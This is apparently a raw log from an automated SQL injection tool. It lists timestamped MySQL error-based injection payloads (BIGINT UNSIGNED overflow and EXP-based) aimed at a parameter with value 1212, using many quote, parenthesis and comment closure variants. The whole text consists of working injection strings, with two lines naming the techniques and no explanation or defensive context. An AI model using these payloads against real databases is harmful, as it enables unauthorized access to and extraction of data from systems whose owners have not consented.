[10:59:23] [PAYLOAD] 1212") WHERE 6164=6164 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- xNoX
[10:59:23] [PAYLOAD] 1212) WHERE 5780=5780 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- DEQp
[10:59:23] [PAYLOAD] 1212' WHERE 1154=1154 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- rnmW
[10:59:23] [PAYLOAD] 1212" WHERE 8456=8456 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- nMTS
[10:59:23] [PAYLOAD] 1212 WHERE 5014=5014 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- vieb
[10:59:23] [PAYLOAD] 1212'||(SELECT 0x5a47454f WHERE 6319=6319 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:23] [PAYLOAD] 1212'||(SELECT 0x41417650 FROM DUAL WHERE 6061=6061 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:23] [PAYLOAD] 1212'+(SELECT 0x4d634366 WHERE 3060=3060 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+'
[10:59:23] [PAYLOAD] 1212||(SELECT 0x534f6859 FROM DUAL WHERE 2128=2128 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:23] [PAYLOAD] 1212||(SELECT 0x776c666e WHERE 1721=1721 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:23] [PAYLOAD] 1212+(SELECT CzVP WHERE 6611=6611 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:23] [PAYLOAD] 1212+(SELECT 0x53765542 WHERE 7728=7728 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:23] [PAYLOAD] 1212')) AS bEqI WHERE 7730=7730 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VbHU
[10:59:23] [PAYLOAD] 1212")) AS SyBM WHERE 9288=9288 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VEjO
[10:59:23] [PAYLOAD] 1212)) AS JiLy WHERE 2791=2791 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- RqQR
[10:59:23] [PAYLOAD] 1212') AS HCql WHERE 3421=3421 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- OKcU
[10:59:23] [PAYLOAD] 1212") AS GqbM WHERE 7769=7769 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- XrAZ
[10:59:23] [PAYLOAD] 1212) AS fgmR WHERE 2047=2047 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- YCtM
[10:59:23] [PAYLOAD] 1212` WHERE 3279=3279 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- Xvlq
[10:59:23] [PAYLOAD] 1212`) WHERE 1917=1917 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- bDGq
[10:59:23] [PAYLOAD] 1212`=`1212` AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND `1212`=`1212
[10:59:23] [PAYLOAD] 1212"="1212" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "1212"="1212
[10:59:23] [PAYLOAD] 1212]-(SELECT 0 WHERE 5222=5222 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))|[1212
[10:59:23] [PAYLOAD] 1212' IN BOOLEAN MODE) AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(9753=9753,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))#
[10:59:23] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:59:23] [PAYLOAD] 1212) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- eHsJ
[10:59:23] [PAYLOAD] 1212') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- FKsA
[10:59:23] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- ktbn
[10:59:23] [PAYLOAD] 1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- VvRM
[10:59:23] [PAYLOAD] 1212) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (3398=3398
[10:59:24] [PAYLOAD] 1212)) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((3814=3814
[10:59:24] [PAYLOAD] 1212))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (((5248=5248
[10:59:24] [PAYLOAD] 1212 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))
[10:59:24] [PAYLOAD] 1212') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('xuod'='xuod
[10:59:24] [PAYLOAD] 1212')) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('FSpV'='FSpV
[10:59:24] [PAYLOAD] 1212'))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('bUnR'='bUnR
[10:59:24] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'UBMd'='UBMd
[10:59:24] [PAYLOAD] 1212') OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('EYop' LIKE 'EYop
[10:59:24] [PAYLOAD] 1212')) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (('SoIS' LIKE 'SoIS
[10:59:24] [PAYLOAD] 1212'))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((('IHow' LIKE 'IHow
[10:59:24] [PAYLOAD] 1212%' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'ySVh%'='ySVh
[10:59:24] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'HgKu' LIKE 'HgKu
[10:59:24] [PAYLOAD] 1212") OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("plzf"="plzf
[10:59:24] [PAYLOAD] 1212")) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("SjTI"="SjTI
[10:59:24] [PAYLOAD] 1212"))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("yJFY"="yJFY
[10:59:24] [PAYLOAD] 1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "cBIl"="cBIl
[10:59:24] [PAYLOAD] 1212") OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("JnfY" LIKE "JnfY
[10:59:24] [PAYLOAD] 1212")) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND (("YwFb" LIKE "YwFb
[10:59:24] [PAYLOAD] 1212"))) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND ((("uuAr" LIKE "uuAr
[10:59:24] [PAYLOAD] 1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "ZVUh" LIKE "ZVUh
[10:59:24] [PAYLOAD] 1212 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- URjc
[10:59:24] [PAYLOAD] 1212 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))# cnbU
[10:59:24] [PAYLOAD] 1212' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) OR 'yjrt'='BGGw
[10:59:24] [PAYLOAD] 1212') WHERE 7040=7040 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- MbMa
[10:59:24] [PAYLOAD] 1212") WHERE 7288=7288 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- LEOr
[10:59:24] [PAYLOAD] 1212) WHERE 3994=3994 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- fBhK
[10:59:24] [PAYLOAD] 1212' WHERE 8509=8509 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- ERyK
[10:59:24] [PAYLOAD] 1212" WHERE 9961=9961 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- brOD
[10:59:24] [PAYLOAD] 1212 WHERE 2117=2117 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- XtUG
[10:59:24] [PAYLOAD] 1212'||(SELECT 0x4b534c51 WHERE 1863=1863 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:24] [PAYLOAD] 1212'||(SELECT 0x65786e7a FROM DUAL WHERE 4445=4445 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||'
[10:59:24] [PAYLOAD] 1212'+(SELECT 0x4472716d WHERE 3338=3338 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+'
[10:59:24] [PAYLOAD] 1212||(SELECT 0x436a6946 FROM DUAL WHERE 5061=5061 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:24] [PAYLOAD] 1212||(SELECT 0x4f506853 WHERE 1174=1174 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))||
[10:59:24] [PAYLOAD] 1212+(SELECT MWyF WHERE 2479=2479 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:24] [PAYLOAD] 1212+(SELECT 0x45794a6a WHERE 7185=7185 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))+
[10:59:24] [PAYLOAD] 1212')) AS oKJi WHERE 6844=6844 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- uTvw
[10:59:24] [PAYLOAD] 1212")) AS jewH WHERE 8659=8659 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- KlWx
[10:59:24] [PAYLOAD] 1212)) AS baoy WHERE 3983=3983 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- cJta
[10:59:24] [PAYLOAD] 1212') AS yBfV WHERE 2680=2680 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- ldSl
[10:59:24] [PAYLOAD] 1212") AS MkoI WHERE 2970=2970 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- hqHv
[10:59:24] [PAYLOAD] 1212) AS Vboz WHERE 1917=1917 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- kSBP
[10:59:24] [PAYLOAD] 1212` WHERE 7433=7433 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- AeNp
[10:59:24] [PAYLOAD] 1212`) WHERE 1262=1262 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))-- DRsN
[10:59:24] [PAYLOAD] 1212`=`1212` OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND `1212`=`1212
[10:59:24] [PAYLOAD] 1212"="1212" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))) AND "1212"="1212
[10:59:24] [PAYLOAD] 1212]-(SELECT 0 WHERE 8877=8877 OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610))))|[1212
[10:59:24] [PAYLOAD] 1212' IN BOOLEAN MODE) OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(7566=7566,1))),0x7176627071,0x78))s), 8446744073709551610, 8446744073709551610)))#
[10:59:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:59:24] [PAYLOAD] 1212) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- brDS
[10:59:24] [PAYLOAD] 1212') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- dofK
[10:59:24] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- jfSf
[10:59:24] [PAYLOAD] 1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- yZLB
[10:59:24] [PAYLOAD] 1212) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (6729=6729
[10:59:24] [PAYLOAD] 1212)) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((7602=7602
[10:59:24] [PAYLOAD] 1212))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (((6440=6440
[10:59:24] [PAYLOAD] 1212 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))
[10:59:24] [PAYLOAD] 1212') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ('Fiqe'='Fiqe
[10:59:24] [PAYLOAD] 1212')) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (('NsXY'='NsXY
[10:59:25] [PAYLOAD] 1212'))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((('QHXU'='QHXU
[10:59:25] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND 'vTnf'='vTnf
[10:59:25] [PAYLOAD] 1212') AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ('aDIC' LIKE 'aDIC
[10:59:25] [PAYLOAD] 1212')) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (('GEdp' LIKE 'GEdp
[10:59:25] [PAYLOAD] 1212'))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((('mvPp' LIKE 'mvPp
[10:59:25] [PAYLOAD] 1212%' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND 'HbNz%'='HbNz
[10:59:25] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND 'ujrW' LIKE 'ujrW
[10:59:25] [PAYLOAD] 1212") AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ("iCNw"="iCNw
[10:59:25] [PAYLOAD] 1212")) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (("vsdz"="vsdz
[10:59:25] [PAYLOAD] 1212"))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((("oFuc"="oFuc
[10:59:25] [PAYLOAD] 1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND "zKht"="zKht
[10:59:25] [PAYLOAD] 1212") AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ("SzTh" LIKE "SzTh
[10:59:25] [PAYLOAD] 1212")) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND (("DbrT" LIKE "DbrT
[10:59:25] [PAYLOAD] 1212"))) AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND ((("jkyk" LIKE "jkyk
[10:59:25] [PAYLOAD] 1212" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) AND "DjBZ" LIKE "DjBZ
[10:59:25] [PAYLOAD] 1212 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- YjfK
[10:59:25] [PAYLOAD] 1212 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))# ILdB
[10:59:25] [PAYLOAD] 1212' AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)) OR 'YGxg'='fzEz
[10:59:25] [PAYLOAD] 1212') WHERE 1286=1286 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- UCUr
[10:59:25] [PAYLOAD] 1212") WHERE 4110=4110 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- YCqM
[10:59:25] [PAYLOAD] 1212) WHERE 2322=2322 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- tmnY
[10:59:25] [PAYLOAD] 1212' WHERE 3935=3935 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- HjBU
[10:59:25] [PAYLOAD] 1212" WHERE 1576=1576 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- VhAz
[10:59:25] [PAYLOAD] 1212 WHERE 9239=9239 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- iWRD
[10:59:25] [PAYLOAD] 1212'||(SELECT 0x61546e6f WHERE 5499=5499 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||'
[10:59:25] [PAYLOAD] 1212'||(SELECT 0x744f5070 FROM DUAL WHERE 9481=9481 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||'
[10:59:25] [PAYLOAD] 1212'+(SELECT 0x5372674a WHERE 4563=4563 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))+'
[10:59:25] [PAYLOAD] 1212||(SELECT 0x44646378 FROM DUAL WHERE 4257=4257 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||
[10:59:25] [PAYLOAD] 1212||(SELECT 0x6763536d WHERE 6323=6323 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))||
[10:59:25] [PAYLOAD] 1212+(SELECT hpjY WHERE 1260=1260 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))+
[10:59:25] [PAYLOAD] 1212+(SELECT 0x74454e54 WHERE 5249=5249 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x)))+
[10:59:25] [PAYLOAD] 1212')) AS ntQN WHERE 2274=2274 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- mocj
[10:59:25] [PAYLOAD] 1212")) AS lCvR WHERE 9002=9002 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- YwRI
[10:59:25] [PAYLOAD] 1212)) AS NMPh WHERE 4676=4676 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- ffEo
[10:59:25] [PAYLOAD] 1212') AS uhKy WHERE 2461=2461 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7162707a71,(SELECT (ELT(3734=3734,1))),0x7176627071,0x78))x))-- RFoz
